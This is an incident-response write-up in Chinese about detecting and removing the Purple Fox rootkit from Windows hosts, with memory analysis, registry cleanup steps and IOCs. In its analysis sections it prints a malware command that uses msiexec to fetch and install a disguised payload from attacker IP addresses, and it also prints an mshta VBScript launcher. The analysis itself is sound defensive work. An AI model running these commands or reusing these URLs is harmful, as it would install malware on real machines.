应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)

admin 2024年12月9日23:02:52应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)已关闭评论42 views字数 3191阅读10分38秒阅读模式
1. 概述
一般情况下,常规的如恶意dll注入到svchost.exe进程以后,若没有持久化的话我们直接重启svchost.exe即可清除相关的恶意dll;若存在持久化的话,一般情况下是通过注册表、服务、进程、定时任务来实现持久化。但在前几天应急的话发现一个难搞的顽固病毒-紫狐,处置了很久,记录一下。
该病毒的攻击方式主要可以利用以下方式来实现:
SMB爆破sqlserver爆破永恒之蓝

2. 病毒特征

分析了一下,该病毒主要有以下特征:
DLL文件加强壳加载驱动方式实现隐藏利用PendingFileRenameOperations实现延时删除注入系统进程svchost.exe躲避检测

3. 病毒应急

3.1 病毒现象

某用户内网多台主机同时报端口扫描,

应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)
通过监测平台看了一下,对大量互联网的445端口进行扫描
应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)
登录到本机,可以看到相关的进程为svchost.exe
应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)
应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)
应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)
按照常规的思路,直接把svchost.exe给干掉,发现过一会相关的进程又重新拉起了,这种情况都是有持久化的,使用autoruns对持久化进行分析,找了半天,无果,未发现可疑的项,直接使用processhacker对svchost的内存进行分析,发现存在msiexec的异常操作,直接对内存进行分析。
应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)

3.2 mshta恶意利用

mshta.exe vbscript:createobject("wscript.shell").run("@Cmd@",0)(window.close)

3.3 smb扫描

0x9c3a4 (10): ScanSmbHB60x9c4ac (70): 61.177.152.242|6|2|[SMB:H1:P1.30.3:A10:R3:B3:C3:D1:N3:SMB]|Smb.6bc.Us|0x9c724 (60): Cmd /c for /d %i in (@WEB@) do Msiexec /i http://%i/@FIN@ /Q0x9c7e3 (12): TScanAckTask0x9d92c (31): C:\Windows\Apppatch\Aclmain.sdb0x9e368 (11): 98.126.89.1

3.4 msiexec白加黑利用

0x137b788 (20): 125.68.199.232:174500x137b7ac (20): 125.68.199.232:174500x137b7d0 (12): 125.68.199.20x137b800 (41): 125.68.199.232:17450 196.202.30.19:16307 0x137b838 (21): 220.179.28.85:18162:d0x137b85c (13): 220.179.28.850x137b88c (61): 220.179.28.85:18162 125.68.199.232:17450 196.202.30.19:16307 0x137b8d8 (21): Cmd /c for /d %i in (0x137b8fc (80): Cmd /c for /d %i in (220.179.28.85:18162 125.68.199.232:17450 196.202.30.19:16300x137b95c (40): ) do Msiexec /i http://%i/08388E25.Png /0x137b994 (40): ) do Msiexec /i http://%i/08388E25.Png /0x137b9cc (123): Cmd /c for /d %i in (220.179.28.85:18162 125.68.199.232:17450 196.202.30.19:16307 ) do Msiexec /i http://%i/08388E25.Png /Q

3.4.1 msiexec分析

选择上面msiexec白加黑利用的url,直接下载相关的png

http://220.179.28.85:18162/08388E25.Pnghttp://125.68.199.232:17450/08388E25.Pnghttp://196.202.30.19:1630/08388E25.Png

实际上下载以后其实就是msi格式的,

应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)
应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)

相关的行为主要如下所示:

应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)

应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)

详细报告详见:

https://www.virustotal.com/gui/file/5f062d034dfdf7ac36b391dd6da1304b68574c65757673896cba13374551cafa/behavior/C2AE

3.4.2 密码爆破

通过对svchost.exe的内存进行分析,可以看到其内存里面有大量的密码字段,由于紫狐具有SMB爆破和mysql爆破的功能,这里面可以看到大量的密码爆破。

应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)

4. 处置

4.1 安全模式启动

因为恶意的dll为ring-3级别的,正常情况下相关的dll无法直接删除,需要重启以安全模式才能删除,直接重启,按F8进入安全模式。

4.2 删除恶意的dll文件

直接搜一下相关的dll文件,其格式为MSxxxxxxapp.dll,其中xxxxxx为随机的数字
应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)

4.3 清除注册表

其在注册表中有两项,需要把这两项给清除掉

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SessionManager\PendingFileRenameOperations中的:
C:\Windows\System32\MsxxxxxxApp.dll

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost的netsvcs中的:
MsxxxxxxApp

4.3.1 注册表删除PendingFileRenameOperations

PendingFileRenameOperations记录的是一个未成功进行的文件更名操作。
在这里,需要把里面的C:\Windows\System32\MsxxxxxxApp.dll删除。
应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)

4.3.2 删除netsvcs

清除该项的恶意dll文件
应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)

4.4 重启验证

直接重启系统,等待一段时间,若没有外连445现象则说明清除完成。

5. 高隐匿分析

紫狐会使用Roootkit的高隐匿性来实现,其使用的rootkit为Hidden,相关的Github链接为:https://github.com/JKornev/hidden
其主要的功能为实现文件、进程、注册表、目录等隐匿,同时可以实现进程保护:
hide registry keys and valueshide files and directorieshide processes (experimental, might be not stable)protect specific processesexclude specific processes from hiding and protection featuresusermode interface (lib and cli) for working with a driverand so on
相关的使用方法如下:
应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)
对于这种类型的rootkit,可以参考相关文章:
https://www.yuque.com/feiniao112/rq5bav/hx2kl5

6. IOC

6.1 IP  220.179.28.85  125.68.199.232  196.202.30.196.2 URL  http://220.179.28.85:18162/08388E25.Png  http://125.68.199.232:17450/08388E25.Png  http://196.202.30.19:1630/08388E25.Png6.3 MD5  MD5:8708d160001b08b232090c4c7d2a9d4e
更多内容请关注:https://www.yuque.com/feiniao112

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月9日23:02:52
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   应急响应案例2-Windows Rootkit系列之紫狐病毒(驱动隐藏)https://cn-sec.com/archives/3487000.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.